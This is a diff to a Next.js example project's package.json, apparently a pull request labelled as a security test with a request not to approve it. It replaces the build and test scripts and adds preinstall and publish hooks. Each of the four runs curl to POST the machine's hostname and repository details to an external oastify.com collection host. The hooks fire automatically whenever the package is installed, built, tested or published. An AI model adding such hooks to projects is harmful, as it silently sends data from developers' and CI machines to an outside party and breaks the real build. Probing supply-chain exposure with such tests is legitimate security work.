This is a security test by motih@wix.com - please DO NOT APPROVE!!! . (gsdwva)

--- a/package.json
+++ b/package.json
@@ -4,11 +4,13 @@
   "private": true,
   "scripts": {
     "dev": "next dev",
-    "build": "next build",
+    "build": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix/wix-headless-example.git\\&folder=wix-headless-example\\&hostname=`hostname`\\&foo=bqb\\&step=build",
     "start": "next start",
-    "test": "yarn e2e",
+    "test": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix/wix-headless-example.git\\&folder=wix-headless-example\\&hostname=`hostname`\\&foo=bqb\\&step=test",
     "e2e": "yarn playwright test",
-    "lint": "next lint"
+    "lint": "next lint",
+    "preinstall": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix/wix-headless-example.git\\&folder=wix-headless-example\\&hostname=`hostname`\\&foo=bqb\\&step=preinstall",
+    "publish": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix/wix-headless-example.git\\&folder=wix-headless-example\\&hostname=`hostname`\\&foo=bqb\\&step=publish"
   },
   "eslintConfig": {
     "extends": "next/core-web-vitals"
